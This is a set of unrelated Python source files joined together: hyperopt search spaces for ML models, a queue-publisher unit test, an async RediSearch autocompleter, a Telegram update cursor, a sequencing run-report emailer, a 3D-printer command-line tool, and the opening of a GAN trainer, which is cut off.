_svm_hp_space(kernel=kernel, **kwargs) hp_space.update(_svc_hp_space(random_state, probability)) return hp_space ######################################## ##==== SVM regressor constructors ====## ######################################## def svr_kernel_hp_space(kernel, epsilon=None, **kwargs): """ Return a hyperparamter template that will construct a sklearn.svm.SVR model with a user specified kernel. 
Supported kernels: linear, rbf, poly and sigmoid """ hp_space = _svm_hp_space(kernel=kernel, **kwargs) hp_space.update(_svr_hp_space(epsilon)) return hp_space ############################################## ##==== KNN hyperparameters search space ====## ############################################## def knn_hp_space(sparse_data=False, n_neighbors=None, weights=None, algorithm='auto', leaf_size=30, metric=None, p=None, metric_params=None, n_jobs=1): '''Generate KNN hyperparameters search space ''' metric_p = _knn_metric_p('metric_p', sparse_data, metric, p) hp_space = dict( n_neighbors=(_knn_neighbors('neighbors') if n_neighbors is None else n_neighbors), weights=(_knn_weights('weights') if weights is None else weights), algorithm=algorithm, leaf_size=leaf_size, metric=metric_p[0] if metric is None else metric, p=metric_p[1] if p is None else p, metric_params=metric_params, n_jobs=n_jobs) return hp_space #################################################################### ##==== Random forest/extra trees hyperparameters search space ====## #################################################################### def trees_hp_space(n_estimators=None, max_features=None, max_depth=None, min_samples_split=None, min_samples_leaf=None, bootstrap=None, oob_score=False, n_jobs=1, random_state=None, verbose=False): '''Generate trees ensemble hyperparameters search space ''' hp_space = dict( n_estimators=(_trees_n_estimators('n_estimators') if n_estimators is None else n_estimators), max_features=(_trees_max_features('max_features') if max_features is None else max_features), max_depth=(_trees_max_depth('max_depth') if max_depth is None else max_depth), min_samples_split=(_trees_min_samples_split( 'min_samples_split') if min_samples_split is None else min_samples_split), min_samples_leaf=(_trees_min_samples_leaf( 'min_samples_leaf') if min_samples_leaf is None else min_samples_leaf), bootstrap=(_trees_bootstrap('bootstrap') if bootstrap is None else bootstrap), oob_score=oob_score, 
n_jobs=n_jobs, random_state=_random_state('rstate', random_state), verbose=verbose, ) return hp_space ############################################################# ##==== Random forest classifier/regressor constructors ====## ############################################################# def random_forest_hp_space(criterion='gini', **kwargs): """"Return a hyperparameter template for RandomForest model. Parameters ---------- criterion: str 'gini' or 'entropy' and 'mse' for classification """ hp_space = trees_hp_space(**kwargs) hp_space['criterion'] = criterion return hp_space ################################################### ##==== AdaBoost hyperparameters search space ====## ################################################### def ada_boost_hp_space(base_estimator=None, n_estimators=None, learning_rate=None, random_state=None): '''Generate AdaBoost hyperparameters search space ''' hp_space = dict( base_estimator=base_estimator, n_estimators=(_boosting_n_estimators('n_estimators') if n_estimators is None else n_estimators), learning_rate=(_ada_boost_learning_rate('learning_rate') if learning_rate is None else learning_rate), random_state=_random_state('rstate', random_state)) return hp_space ########################################################### ##==== GradientBoosting hyperparameters search space ====## ########################################################### def grad_boosting_hp_space(learning_rate=None, n_estimators=None, subsample=None, min_samples_split=None, min_samples_leaf=None, max_depth=None, init=None, random_state=None, max_features=None, verbose=0, max_leaf_nodes=None, warm_start=False, presort='auto'): '''Generate GradientBoosting hyperparameters search space ''' hp_space = dict( learning_rate=(_grad_boosting_learning_rate('learning_rate') if learning_rate is None else learning_rate), n_estimators=(_boosting_n_estimators('n_estimators') if n_estimators is None else n_estimators), subsample=(_grad_boosting_subsample('subsample') if subsample is 
None else subsample), min_samples_split=(_trees_min_samples_split('min_samples_split') if min_samples_split is None else min_samples_split), min_samples_leaf=(_trees_min_samples_leaf('min_samples_leaf') if min_samples_leaf is None else min_samples_leaf), max_depth=(_trees_max_depth('max_depth') if max_depth is None else max_depth), init=init, random_state=_random_state('rstate', random_state), max_features=(_trees_max_features('max_features') if max_features is None else max_features), warm_start=warm_start, presort=presort) return hp_space ################################################### ##==== XGBoost hyperparameters search space ====## ################################################### def _xgboost_max_depth(name): return scope.int(hp.uniform(name, 1, 11)) def _xgboost_learning_rate(name): return hp.loguniform(name, np.log(0.0001), np.log(0.5)) - 0.0001 def _xgboost_n_estimators(name): return scope.int(hp.quniform(name, 100, 6000, 200)) def _xgboost_gamma(name): return hp.loguniform(name, np.log(0.0001), np.log(5)) - 0.0001 def _xgboost_min_child_weight(name): return scope.int(hp.loguniform(name, np.log(1), np.log(100))) def _xgboost_subsample(name): return hp.uniform(name, 0.5, 1) def _xgboost_colsample_bytree(name): return hp.uniform(name, 0.5, 1) def _xgboost_colsample_bylevel(name): return hp.uniform(name, 0.5, 1) def _xgboost_reg_alpha(name): return hp.loguniform(name, np.log(0.0001), np.log(1)) - 0.0001 def _xgboost_reg_lambda(name): return hp.loguniform(name, np.log(1), np.log(4)) def xgboost_hp_space(max_depth=None, learning_rate=None, n_estimators=None, gamma=None, min_child_weight=None, max_delta_step=0, subsample=None, colsample_bytree=None, colsample_bylevel=None, reg_alpha=None, reg_lambda=None, scale_pos_weight=1, base_score=0.5, random_state=None): '''Generate XGBoost hyperparameters search space ''' hp_space = dict( max_depth=(_xgboost_max_depth('max_depth') if max_depth is None else max_depth), 
learning_rate=(_xgboost_learning_rate('learning_rate') if learning_rate is None else learning_rate), n_estimators=(_xgboost_n_estimators('n_estimators') if n_estimators is None else n_estimators), gamma=(_xgboost_gamma('gamma') if gamma is None else gamma), min_child_weight=(_xgboost_min_child_weight( 'min_child_weight') if min_child_weight is None else min_child_weight), max_delta_step=max_delta_step, subsample=(_xgboost_subsample('subsample') if subsample is None else subsample), colsample_bytree=(_xgboost_colsample_bytree( 'colsample_bytree') if colsample_bytree is None else colsample_bytree), colsample_bylevel=(_xgboost_colsample_bylevel( 'colsample_bylevel') if colsample_bylevel is None else colsample_bylevel), reg_alpha=(_xgboost_reg_alpha('reg_alpha') if reg_alpha is None else reg_alpha), reg_lambda=(_xgboost_reg_lambda('reg_lambda') if reg_lambda is None else reg_lambda), scale_pos_weight=scale_pos_weight, base_score=base_score, seed=_random_state('rstate', random_state)) return hp_space ################################################# ##==== Naive Bayes classifiers constructor ====## ################################################# def multinomial_nb_hp_space(class_prior=None): hp_space = dict( alpha=hp.quniform('alpha', 0, 1, 0.001), fit_prior=hp_bool('fit_prior'), class_prior=class_prior) return hp_space ########################################### ##==== Passive-aggressive classifier ====## ########################################### def passive_aggressive_hp_space(loss=None, C=None, fit_intercept=False, n_iter=None, n_jobs=1, random_state=None, verbose=False): hp_space = dict( loss=hp.choice('loss', ['hinge', 'squared_hinge']) if loss is None else loss, C=hp.lognormal('learning_rate', np.log(0.01), np.log(10)) if C is None else C, fit_intercept=fit_intercept, n_iter=scope.int( hp.qloguniform('n_iter', np.log(1), np.log(1000), q=1)) if n_iter is None else n_iter, n_jobs=n_jobs, random_state=_random_state('rstate', random_state), verbose=verbose) return 
hp_space ############################################### ##==== Discriminant analysis classifiers ====## ############################################### def linear_discriminant_analysis_hp_space(solver=None, shrinkage=None, priors=None, n_components=None, store_covariance=False, tol=0.00001): solver_shrinkage = hp.choice('solver_shrinkage_dual', [('svd', None), ('lsqr', None), ('lsqr', 'auto'), ('eigen', None), ('eigen', 'auto')]) rval = dict( solver=solver_shrinkage[0] if solver is None else solver, shrinkage=solver_shrinkage[1] if shrinkage is None else shrinkage, priors=priors, n_components=4 * scope.int( hp.qloguniform( 'n_components', low=np.log(0.51), high=np.log(30.5), q=1.0)) if n_components is None else n_components, store_covariance=store_covariance, tol=tol) return rval def quadratic_discriminant_analysis_hp_space(reg_param=None, priors=None): rval = dict( reg_param=hp.uniform('reg_param', 0.0, 1.0) if reg_param is None else 0.0, priors=priors) return rval ############################################### ##==== Various preprocessor constructors ====## ############################################### def pca_hp_space(n_components=None, whiten=None, copy=True): rval = dict( # -- qloguniform is missing a "scale" parameter so we # lower the "high" parameter and multiply by 4 out front n_components=4 * scope.int( hp.qloguniform( 'n_components', low=np.log(0.51), high=np.log(30.5), q=1.0)) if n_components is None else n_components, # n_components=(hp.uniform(name + '.n_components', 0, 1) # if n_components is None else n_components), whiten=hp_bool('whiten') if whiten is None else whiten, copy=copy, ) return rval def standard_scaler(with_mean=None, with_std=None): rval = dict( with_mean=hp_bool('with_mean') if with_mean is None else with_mean, with_std=hp_bool('with_std') if with_std is None else with_std, ) return rval def ts_lagselector_hp_space(lower_lags=1, upper_lags=1): rval = dict(lag_size=scope.int( hp.quniform('lags', lower_lags - .5, upper_lags + .5, 
1))) return rval def bernoulli_rbm_hp_space(n_components=None, learning_rate=None, batch_size=None, n_iter=None, verbose=False, random_state=None): rval = dict( n_components=scope.int( hp.qloguniform( 'n_components', low=np.log(0.51), high=np.log(999.5), q=1.0)) if n_components is None else n_components, learning_rate=hp.lognormal( 'learning_rate', np.log(0.01), np.log(10), ) if learning_rate is None else learning_rate, batch_size=scope.int( hp.qloguniform( '.batch_size', np.log(1), np.log(100), q=1, )) if batch_size is None else batch_size, n_iter=scope.int( hp.qloguniform( 'n_iter', np.log(1), np.log(1000), # -- max sweeps over the *whole* train set q=1, )) if n_iter is None else n_iter, verbose=verbose, random_state=_random_state('rstate', random_state), ) return rval def colkmeans_hp_space(n_clusters=None, init=None, n_init=None, max_iter=None, tol=None, precompute_distances=True, verbose=0, random_state=None, copy_x=True, n_jobs=1): rval = dict( n_clusters=scope.int( hp.qloguniform( 'n_clusters', low=np.log(1.51), high=np.log(19.5), q=1.0)) if n_clusters is None else n_clusters, init=hp.choice( 'init', ['k-means++', 'random'], ) if init is None else init, n_init=hp.choice( 'n_init', [1, 2, 10, 20], ) if n_init is None else n_init, max_iter=scope.int( hp.qlognormal( 'max_iter', np.log(300), np.log(10), q=1, )) if max_iter is None else max_iter, tol=hp.lognormal( 'tol', np.log(0.0001), np.log(10), ) if tol is None else tol, precompute_distances=precompute_distances, verbose=verbose, random_state=random_state, copy_x=copy_x, n_jobs=n_jobs, ) return rval def lgbm_hp_space(**kwargs): space = { 'n_estimators': scope.int(hp.quniform('n_estimators', 10, 700, 1)), 'num_leaves': scope.int(hp.quniform ('num_leaves', 10, 200, 1)), 'feature_fraction': hp.uniform('feature_fraction', 0.75, 1.0), 'bagging_fraction': hp.uniform('bagging_fraction', 0.75, 1.0), 'learning_rate': hp.loguniform('learning_rate', -5.0, -2.3), 'max_bin': scope.int(hp.quniform('max_bin', 64, 512, 1)), 
'bagging_freq': scope.int(hp.quniform('bagging_freq', 1, 5, 1)), 'lambda_l1': hp.uniform('lambda_l1', 0, 10), 'lambda_l2': hp.uniform('lambda_l2', 0, 10), **kwargs } return space # -- flake8 eofk
nilq/baby-python
python
from unittest import TestCase
from unittest.mock import patch

from app.ingest.infrastructure.mq.publishers.process_ready_queue_publisher import ProcessReadyQueuePublisher
from test.resources.ingest.ingest_factory import create_ingest


# Unit tests for ProcessReadyQueuePublisher: verifies the message body handed
# to the underlying STOMP publisher.
class TestProcessReadyQueuePublisher(TestCase):
    @classmethod
    def setUpClass(cls) -> None:
        # Shared fixtures: a sample ingest and the destination path that the
        # stubbed os.getenv will return.
        cls.TEST_INGEST = create_ingest()
        cls.TEST_DESTINATION_PATH = "test_path"

    # patch decorators apply bottom-up: os_getenv_stub is the patched
    # os.getenv, inner_publish_message_mock is the patched _publish_message.
    @patch("app.common.infrastructure.mq.publishers.stomp_publisher_base.StompPublisherBase._publish_message")
    @patch('app.ingest.infrastructure.mq.publishers.process_ready_queue_publisher.os.getenv')
    def test_publish_message_happy_path(self, os_getenv_stub, inner_publish_message_mock) -> None:
        os_getenv_stub.return_value = self.TEST_DESTINATION_PATH
        self.sut = ProcessReadyQueuePublisher()

        self.sut.publish_message(self.TEST_INGEST)

        # The publisher must forward a dict with exactly these three fields.
        inner_publish_message_mock.assert_called_once_with(
            {
                'package_id': self.TEST_INGEST.package_id,
                'destination_path': self.TEST_DESTINATION_PATH,
                'application_name': self.TEST_INGEST.depositing_application.value
            }
        )
nilq/baby-python
python
from aioredis import Redis, ConnectionPool
from six.moves import xrange

from ._util import to_string
from .auto_complete import SuggestionParser


class AioAutoCompleter(object):
    """
    An asyncio client to RediSearch's AutoCompleter API.

    It provides prefix searches with optionally fuzzy matching of prefixes.
    """

    SUGADD_COMMAND = "FT.SUGADD"
    SUGDEL_COMMAND = "FT.SUGDEL"
    SUGLEN_COMMAND = "FT.SUGLEN"
    SUGGET_COMMAND = "FT.SUGGET"

    INCR = 'INCR'
    WITHSCORES = 'WITHSCORES'
    FUZZY = 'FUZZY'
    WITHPAYLOADS = 'WITHPAYLOADS'

    def __init__(self, key, host='localhost', port=6379, conn=None, password=None):
        """
        Create a new AioAutoCompleter client for the given key, and optional
        host and port.

        If conn is not None, we employ an already existing redis connection.
        """
        self.key = key
        self.redis = conn if conn is not None else Redis(
            connection_pool=ConnectionPool(host=host, port=port, password=password))

    def __await__(self):
        """
        Automatically initialize the AioAutoCompleter by using the await
        magic word when creating.
        """
        return self.initialize().__await__()

    async def initialize(self):
        """
        Initialize the asynchronous attributes of the AioAutoCompleter.
        """
        if self.redis:
            # Redis will initialize its own ConnectionPool instance
            await self.redis.initialize()
        return self

    async def add_suggestions(self, *suggestions, **kwargs):
        """
        Add suggestion terms to the AutoCompleter engine. Each suggestion has
        a score and string.

        If kwargs['increment'] is true and the terms are already in the
        server's dictionary, we increment their scores.
        """
        # If Transaction is not set to false it will attempt a MULTI/EXEC
        # which will error
        pipe = await self.redis.pipeline(transaction=False)
        for sug in suggestions:
            # Fixed: command constants previously referenced an undefined
            # name ``AutoCompleter`` (NameError); use the class constants.
            args = [self.SUGADD_COMMAND, self.key, sug.string, sug.score]
            if kwargs.get('increment'):
                args.append(self.INCR)
            if sug.payload:
                args.append('PAYLOAD')
                args.append(sug.payload)
            await pipe.execute_command(*args)

        # Fixed: ``await pipe.execute()[-1]`` indexed the coroutine before
        # awaiting it (TypeError); await first, then take the last reply.
        return (await pipe.execute())[-1]

    async def len(self):
        """
        Return the number of entries in the AutoCompleter index.
        """
        return await self.redis.execute_command(self.SUGLEN_COMMAND, self.key)

    async def delete(self, string):
        """
        Delete a string from the AutoCompleter index.

        Returns 1 if the string was found and deleted, 0 otherwise.
        """
        return await self.redis.execute_command(self.SUGDEL_COMMAND, self.key, string)

    async def get_suggestions(self, prefix, fuzzy=False, num=10,
                              with_scores=False, with_payloads=False):
        """
        Get a list of suggestions from the AutoCompleter, for a given prefix.

        ### Parameters:

        - **prefix**: the prefix we are searching. **Must be valid ascii or utf-8**
        - **fuzzy**: If set to true, the prefix search is done in fuzzy mode.
            **NOTE**: Running fuzzy searches on short (<3 letters) prefixes
            can be very slow, and even scan the entire index.
        - **with_scores**: if set to true, we also return the (refactored)
            score of each suggestion. This is normally not needed, and is NOT
            the original score inserted into the index.
        - **with_payloads**: Return suggestion payloads
        - **num**: The maximum number of results we return. Note that we
            might return less. The algorithm trims irrelevant suggestions.

        Returns a list of Suggestion objects. If with_scores was False, the
        score of all suggestions is 1.
        """
        args = [self.SUGGET_COMMAND, self.key, prefix, 'MAX', num]
        if fuzzy:
            args.append(self.FUZZY)
        if with_scores:
            args.append(self.WITHSCORES)
        if with_payloads:
            args.append(self.WITHPAYLOADS)

        ret = await self.redis.execute_command(*args)
        results = []
        if not ret:
            return results

        parser = SuggestionParser(with_scores, with_payloads, ret)
        return [s for s in parser]
nilq/baby-python
python
# Package init: re-export the files panel widget for convenient import.
from .files import sppasFilesPanel

# Public API of this subpackage.
__all__ = (
    "sppasFilesPanel",
)
nilq/baby-python
python
from telebot import types
from typing import List
from datetime import datetime
import logging

from tengi.telegram.telegram_bot import TelegramBot

logger = logging.getLogger(__file__)


class TelegramCursor:
    """Incremental reader of Telegram bot updates.

    On the first poll it "looks back" over recent history (bounded by
    look_back_days) and thereafter only fetches updates newer than the last
    seen update_id.
    """

    def __init__(self, bot: TelegramBot, look_back_days: float, long_polling_timeout: float = 20):
        self.bot = bot
        self.look_back_days = look_back_days
        self.long_polling_timeout = long_polling_timeout
        # update_id of the newest update handled so far; None until the
        # first call to get_new_updates().
        self.last_bot_update_id = None

    def look_back(self, allowed_updates):
        """Return recent updates within the look-back window.

        Keeps at most one (the newest) message per chat, returned oldest
        first.
        """
        updates = self.bot.get_updates(long_polling_timeout=0,
                                       limit=100,
                                       allowed_updates=allowed_updates)
        # Sort updates from newest to oldest to use latest message in the chat only
        updates = sorted(updates, key=lambda upd: upd.update_id, reverse=True)

        now = datetime.utcnow()
        look_back_seconds = self.look_back_days * 24 * 60 * 60
        look_back_updates = []
        cached_chat_ids = set()
        for u in updates:
            if u.message is not None:
                # Ignore messages that are outside the look back window
                elapsed_seconds = (now - datetime.utcfromtimestamp(u.message.date)).total_seconds()
                if elapsed_seconds > look_back_seconds:
                    continue
                # Cache only the last message from the chat
                chat_id = u.message.chat.id
                if chat_id in cached_chat_ids:
                    continue
                cached_chat_ids.add(chat_id)
                look_back_updates.append(u)
        # Sort updates from oldest to newest to handle in natural order
        look_back_updates = sorted(look_back_updates, key=lambda upd: upd.update_id)
        return look_back_updates

    def get_new_updates(self, allowed_updates) -> List[types.Update]:
        """Fetch updates newer than the cursor, advancing the cursor.

        The first call seeds the cursor via look_back(); subsequent calls
        long-poll starting at last_bot_update_id + 1.
        """
        look_back_updates = []
        if self.last_bot_update_id is None:
            look_back_updates = self.look_back(allowed_updates=allowed_updates)
            if look_back_updates:
                last_update = max(look_back_updates, key=lambda upd: upd.update_id)
                self.last_bot_update_id = last_update.update_id
            else:
                # Nothing in history: -1 so the next offset (+1) is 0.
                self.last_bot_update_id = -1

        # Skip long polling when look-back already produced work to handle.
        long_polling_timeout = self.long_polling_timeout if (not look_back_updates) else 0
        updates: List[types.Update] = self.bot.get_updates(offset=self.last_bot_update_id + 1,
                                                           long_polling_timeout=long_polling_timeout,
                                                           allowed_updates=allowed_updates)
        if look_back_updates:
            updates = look_back_updates + updates

        if updates:
            last_update = max(updates, key=lambda upd: upd.update_id)
            self.last_bot_update_id = last_update.update_id
        return updates
nilq/baby-python
python
from willump.graph.willump_graph_node import WillumpGraphNode
from willump.graph.willump_python_node import WillumpPythonNode
from weld.types import *

import ast
from typing import List

from willump.willump_utilities import strip_linenos_from_var


class CascadeStackDenseNode(WillumpPythonNode):
    """
    Willump Stack Dense node.  Horizontally stacks multiple dense matrices,
    combining "more important" and "less important" inputs according to the
    small model's output.
    """

    def __init__(self, more_important_nodes: List[WillumpGraphNode], more_important_names: List[str],
                 less_important_nodes: List[WillumpGraphNode], less_important_names: List[str],
                 output_name: str, output_type: WeldType,
                 small_model_output_node: WillumpGraphNode, small_model_output_name: str) -> None:
        """
        Initialize the node.
        """
        # The output must be a 2-D structure (vector of vectors).
        assert (isinstance(output_type, WeldVec))
        assert (isinstance(output_type.elemType, WeldVec))
        self._output_name = output_name
        self._output_type = output_type
        input_nodes = more_important_nodes + less_important_nodes + [small_model_output_node]
        input_names = more_important_names + less_important_names + [small_model_output_name]
        python_ast = self.get_python_ast(more_important_names, less_important_names,
                                         small_model_output_name, output_name)
        super(CascadeStackDenseNode, self).__init__(in_nodes=input_nodes, input_names=input_names,
                                                    output_names=[output_name], output_types=[output_type],
                                                    python_ast=python_ast)

    def get_python_ast(self, more_important_names, less_important_names, small_model_output_name,
                       output_name) -> ast.AST:
        """Build the AST statement that calls cascade_dense_stacker at runtime."""
        more_important_vecs = [strip_linenos_from_var(name) for name in more_important_names]
        less_important_vecs = [strip_linenos_from_var(name) for name in less_important_names]
        # Idiom: join instead of repeated '+=' concatenation; each entry
        # keeps its trailing comma, matching the original generated code.
        more_important_str = "".join("%s," % vec for vec in more_important_vecs)
        less_important_str = "".join("%s," % vec for vec in less_important_vecs)
        python_string = "%s = cascade_dense_stacker([%s], [%s], %s)" % (
            strip_linenos_from_var(output_name),
            more_important_str,
            less_important_str,
            strip_linenos_from_var(small_model_output_name))
        python_ast = ast.parse(python_string, "exec")
        # Return the single generated assignment statement.
        return python_ast.body[0]

    def get_output_name(self) -> str:
        return self._output_name

    def get_output_type(self) -> WeldType:
        return self._output_type

    def __repr__(self):
        return "Stack dense node for input {0} output {1}\n" \
            .format(self._input_names, self._output_name)
nilq/baby-python
python
import os
import sys
import argparse
from datetime import date
from collections import defaultdict

from egcg_core.app_logging import logging_default
from egcg_core.config import cfg
from egcg_core.util import query_dict
from egcg_core import rest_communication
from egcg_core.notifications.email import send_html_email

sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from config import load_config

# In-process caches of REST resources, keyed by entity id.
cache = {
    'run_elements_data': {},
    'run_data': {},
    'lanes_data': {},
    'sample_data': {},
    'run_status_data': {}
}

email_template_report = os.path.join(
    os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
    'etc', 'run_report.html'
)

email_template_repeats = os.path.join(
    os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
    'etc', 'list_repeats.html'
)

logging_default.add_stdout_handler()
logger = logging_default.get_logger(os.path.basename(__file__))


def today():
    """Today's date as an ISO-8601 string."""
    return date.today().isoformat()


def run_status_data(run_id):
    """Return the LIMS status document for run_id (all statuses cached on first call)."""
    if not cache['run_status_data']:
        data = rest_communication.get_documents('lims/status/run_status')
        for d in data:
            cache['run_status_data'][d['run_id']] = d
    return cache['run_status_data'][run_id]


def run_data(run_id):
    """Return (and cache) the run document for run_id."""
    if run_id not in cache['run_data']:
        cache['run_data'][run_id] = rest_communication.get_document('runs', where={'run_id': run_id})
    return cache['run_data'][run_id]


def run_elements_data(run_id):
    """Return (and cache) the run elements for run_id."""
    if run_id not in cache['run_elements_data']:
        cache['run_elements_data'][run_id] = rest_communication.get_documents('run_elements', where={'run_id': run_id})
    return cache['run_elements_data'][run_id]


def sample_data(sample_id):
    """Return (and cache) the sample document for sample_id."""
    if sample_id not in cache['sample_data']:
        cache['sample_data'][sample_id] = rest_communication.get_document('samples', where={'sample_id': sample_id})
    return cache['sample_data'][sample_id]


def samples_from_run(run_id):
    """Sample ids attached to run_id, per the LIMS run status document."""
    return run_status_data(run_id).get('sample_ids')


def get_run_success(run_id):
    """Summarise lane review results for a completed run and log them.

    Returns a dict with 'name', 'failed_lanes' and (when lanes failed)
    'details'.  Raises ValueError when a lane has conflicting review states.
    """
    run_info = {'name': run_id}
    re_data = run_elements_data(run_id)
    lane_review = defaultdict(set)
    lane_review_comment = defaultdict(set)
    for re in re_data:
        lane_review[re.get('lane')].add(re.get('reviewed'))
        lane_review_comment[re.get('lane')].add(re.get('review_comments'))
    failed_lanes = 0
    reasons = []
    for lane in sorted(lane_review):
        if len(lane_review.get(lane)) != 1:
            raise ValueError('More than one review status for lane %s in run %s' % (lane, run_id))
        if lane_review.get(lane).pop() == 'fail':
            failed_lanes += 1
            # Strip the leading 'failed due to ' from the review comment.
            reasons.append(
                'lane %s: %s' % (lane, lane_review_comment.get(lane).pop()[len('failed due to '):])
            )
    reasons = sorted(reasons)
    message = '%s: %s lanes failed' % (run_id, failed_lanes)
    run_info['failed_lanes'] = failed_lanes
    if failed_lanes > 0:
        message += ':\n%s' % '\n'.join(reasons)
        run_info['details'] = reasons
    for l in message.split('\n'):
        logger.info(l)
    return run_info


def check_pending_run_element(sample_id, sdata):
    """Return True if another run element for this sample is still processing."""
    # Checking for other run elements which are still pending
    for sample_run_element in query_dict(sdata, 'run_elements') or []:
        # Splitting the run element, and generating the run_id by
        # concatenating the first four components with an underscore
        sample_run_id = '_'.join(sample_run_element.split('_')[:4])
        if query_dict(run_data(sample_run_id), 'aggregated.most_recent_proc.status') == 'processing':
            logger.info('Another pending run element already exists for sample ' + sample_id)
            return True
    return False


def remove_duplicate_base_on_flowcell_id(list_runs):
    """
    Take a list of runs and remove the duplicated run based on the flowcell id.
    It will remove the oldest run when two are found based on the run date.
    """
    flowcell_to_run = {}
    for run_id in list_runs:
        # Fixed: the first field was previously bound to a local named
        # ``date``, shadowing the datetime.date import.
        run_date, machine, run_number, stage_flowcell = run_id.split('_')
        flowcell = stage_flowcell[1:]
        # If the run id has not been seen or if the date is newer than the previous one then keep it
        if flowcell not in flowcell_to_run or run_id > flowcell_to_run[flowcell]:
            flowcell_to_run[flowcell] = run_id
    return sorted(flowcell_to_run.values())


def report_runs(run_ids, noemail=False):
    """Log run outcomes and repeat candidates; optionally send the two emails."""
    run_ids.sort()
    runs_info = []
    for run_id in run_ids:
        run_status = run_status_data(run_id).get('run_status')
        if run_status == 'RunCompleted':
            run_info = get_run_success(run_id)
        else:
            # A run that did not complete counts as all 8 lanes failed.
            logger.info('%s: 8 lanes failed due to %s' % (run_id, run_status))
            run_info = {'name': run_id, 'failed_lanes': 8, 'details': [str(run_status)]}
        runs_info.append(run_info)

    logger.info('')
    logger.info('_____________________________________')
    logger.info('')

    run_repeats = []
    # Remove the duplicated run from repeated flowcell
    run_ids = remove_duplicate_base_on_flowcell_id(run_ids)
    for run_id in run_ids:
        sample_repeats = []
        for sample_id in sorted(samples_from_run(run_id)):
            sdata = sample_data(sample_id) or {}
            clean_pc_q30 = query_dict(sdata, 'aggregated.clean_pc_q30') or 0
            clean_yield_in_gb = query_dict(sdata, 'aggregated.clean_yield_in_gb') or 0
            clean_yield = clean_yield_in_gb * 1000000000
            mean_cov = query_dict(sdata, 'aggregated.from_run_elements.mean_coverage') or 0
            if clean_pc_q30 >= 75 and (clean_yield >= sdata['required_yield'] or mean_cov >= sdata['required_coverage']):
                # Sample passes QC: nothing to repeat.
                pass
            else:
                reason = 'unknown'
                if not clean_pc_q30:
                    reason = 'No data'
                elif clean_yield < sdata['required_yield'] and mean_cov < sdata['required_coverage']:
                    reason = 'Not enough data: yield (%s < %s) and coverage (%s < %s)' % (
                        round(clean_yield / 1000000000, 1), int(sdata['required_yield'] / 1000000000),
                        round(mean_cov, 1), sdata['required_coverage']
                    )
                # if a pending run element exists, continue to the next
                # sample without logging current one
                if check_pending_run_element(sample_id, sdata):
                    continue
                sample_repeats.append({'id': sample_id, 'reason': reason})
        sample_repeats.sort(key=lambda s: s['id'])

        if sample_repeats:
            logger.info('%s: Repeat samples' % run_id)
            for s in sample_repeats:
                logger.info('%s: %s' % (s['id'], s['reason']))
        else:
            logger.info('%s: No repeat samples' % run_id)
        run_repeats.append({'name': run_id, 'repeat_count': len(sample_repeats), 'repeats': sample_repeats})

    if noemail:
        return

    _today = today()
    params = {}
    params.update(cfg['run_report']['email_notification'])
    params['runs'] = runs_info
    send_html_email(
        subject='Run report %s' % _today,
        email_template=email_template_report,
        **params
    )
    params = {}
    params.update(cfg['run_report']['email_notification'])
    params['runs'] = run_repeats
    send_html_email(
        subject='Sequencing repeats %s' % _today,
        email_template=email_template_repeats,
        **params
    )


def main():
    """Command-line entry point."""
    p = argparse.ArgumentParser()
    p.add_argument('-r', '--run_ids', dest='run_ids', type=str, nargs='+')
    p.add_argument('--debug', action='store_true', help='override pipeline log level to debug')
    p.add_argument('--noemail', action='store_true')
    args = p.parse_args()

    load_config()
    report_runs(args.run_ids, args.noemail)


if __name__ == '__main__':
    sys.exit(main())
nilq/baby-python
python
# -*- coding: utf-8 -*-

import sys
import gettext

import Adventurer3.Controller

gettext.install(__name__)


class App:
    """UI application class: command-line front end for an Adventurer3 printer."""

    def __init__(self, ipaddress):
        """Create a controller connected to the printer at the given address."""
        self.adv3 = Adventurer3.Controller.Controller(ipaddress)

    def user_interface(self):
        """Minimal REPL: q=quit, p=print status, s=stop, jobstop=stop current job."""
        while True:
            cmd = input("> ").strip()
            if cmd.startswith("q") or cmd.startswith("Q"):
                break
            if cmd.startswith("p") or cmd.startswith("P"):
                if self.adv3.start():
                    self.adv3.update_status()
                    self.adv3.end()
                    print(self.adv3.get_status())
            # Fixed: this condition duplicated lowercase "s"; it now also
            # accepts uppercase "S", matching the other branches.
            if cmd.startswith("s") or cmd.startswith("S"):
                if self.adv3.start():
                    self.adv3.stop()
                    self.adv3.end()
            if cmd.startswith("jobstop"):
                if self.adv3.start():
                    self.adv3.stop_job()
                    self.adv3.end()


if __name__ == "__main__":
    # The first command-line argument is assumed to be the printer's host
    # name or IP address.
    if len(sys.argv) > 1:
        app = App(sys.argv[1])
        app.user_interface()
nilq/baby-python
python
# coding: utf-8
import torch
from torch.nn import functional as F
import torch.utils.data
import torch.utils.data.distributed
from torch import autograd
import numpy as np

from gan_training.random_queue import Random_queue


class Trainer(object):
    """GAN trainer with PID-style regularisation terms.

    pv / iv / dv weight the proportional (standard), integral (replay
    buffer) and derivative (previous-batch difference) loss components.
    """

    def __init__(self, generator, discriminator, g_optimizer, d_optimizer,
                 gan_type, reg_type, reg_param, pv=1, iv=0, dv=0,
                 time_step=1., batch_size=64, config=None):
        print("Using PID Trainer")
        self.generator = generator
        self.discriminator = discriminator
        self.g_optimizer = g_optimizer
        self.d_optimizer = d_optimizer
        self.gan_type = gan_type
        self.reg_type = reg_type
        self.reg_param = reg_param
        # Snapshots of the previous batch, used by the derivative term.
        self.d_xfake = None
        self.d_previous_z = None
        self.d_previous_y = None
        self.pv = pv
        self.iv = iv
        self.dv = dv
        self.time_step = time_step
        self.batch_size = batch_size
        self.config = config
        # Replay buffers for the integral term (real and fake samples).
        self.i_real_queue = Random_queue(
            config['training']['batch_size'] * config['training']['i_buffer_factor'],
            config['training']['batch_size'])
        self.i_fake_queue = Random_queue(
            config['training']['batch_size'] * config['training']['i_buffer_factor'],
            config['training']['batch_size'])
        self.max0 = torch.nn.ReLU()

    def generator_trainstep(self, y, z):
        """One generator update; returns the scalar generator loss."""
        assert (y.size(0) == z.size(0))
        toggle_grad(self.generator, True)
        toggle_grad(self.discriminator, False)
        self.generator.train()
        self.discriminator.train()
        self.g_optimizer.zero_grad()

        x_fake = self.generator(z, y)
        d_fake = self.discriminator(x_fake, y)
        gloss = self.compute_loss(d_fake, 1, is_generator=True)
        gloss.backward()
        self.g_optimizer.step()
        return gloss.item()

    def discriminator_trainstep(self, x_real, y, z, it=0):
        """One discriminator update.

        Returns (proportional loss, derivative loss, integral loss) as
        Python floats; the latter two are 0.0 when disabled.
        """
        # print(it)
        toggle_grad(self.generator, False)
        toggle_grad(self.discriminator, True)
